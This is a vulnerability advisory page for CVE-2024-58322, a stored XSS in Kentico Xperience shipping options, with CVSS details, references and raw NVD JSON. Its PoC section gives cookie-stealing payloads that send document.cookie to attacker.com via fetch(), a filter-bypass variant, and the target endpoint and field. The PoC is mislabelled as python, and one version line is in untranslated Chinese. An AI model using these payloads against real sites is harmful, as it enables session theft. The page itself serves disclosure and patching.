CVE-2024-58322

Description

A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious code into shipping options configuration. This could lead to potential theft of sensitive data by executing malicious scripts in users' browsers.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:* - VULNERABLE

Kentico Xperience < 最新热修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2024-58322 Stored XSS PoC - Kentico Xperience Shipping Options
// This PoC demonstrates injecting malicious JavaScript via shipping option configuration

// Step 1: Identify the vulnerable endpoint for shipping options configuration
const vulnerableEndpoint = '/CMSModules/Ecommerce/Pages/Tools/ShippingOptions/ShippingOption_Edit.aspx';

// Step 2: Prepare the XSS payload
const xssPayload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';

// Step 3: Alternative payload using event handler (bypasses some filters)
const altPayload = '" onerror="fetch('https://attacker.com/steal?c='+btoa(document.cookie))" x="';

// Step 4: Example request to inject the payload
const exploitRequest = {
    method: 'POST',
    url: vulnerableEndpoint,
    data: {
        // Shipping option name field - inject XSS here
        'txtShippingName': xssPayload,
        'txtShippingDescription': 'Malicious shipping option',
        // Other required fields...
    }
};

// Step 5: The injected script will execute when users view the shipping options page
// PoC demonstrates the vulnerability exists; actual exploitation requires:
// - Valid low-privilege account credentials
// - Access to shipping options configuration module
// - Ability to induce victim to visit affected page

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-58322
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-58322
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-58322/
[4] VulDB https://vuldb.com/cve/CVE-2024-58322
[5] https://devnet.kentico.com/download/hotfixes
[6] https://www.vulncheck.com/advisories/kentico-xperience-shipping-options-stored-xss

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-58322", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:54.233", "lastModified": "2025-12-27T17:15:46.630", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious code into shipping options configuration. This could lead to potential theft of sensitive data by executing malicious scripts in users' browsers."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.0.158", "matchCriteriaId": "ED168D83-7724-4951-8AAA-87FD42378A7E"}]}]}], "references": [{"url": "https://devnet.kentico.com/download/hotfixes", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/kentico-xperience-shipping-options-stored-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}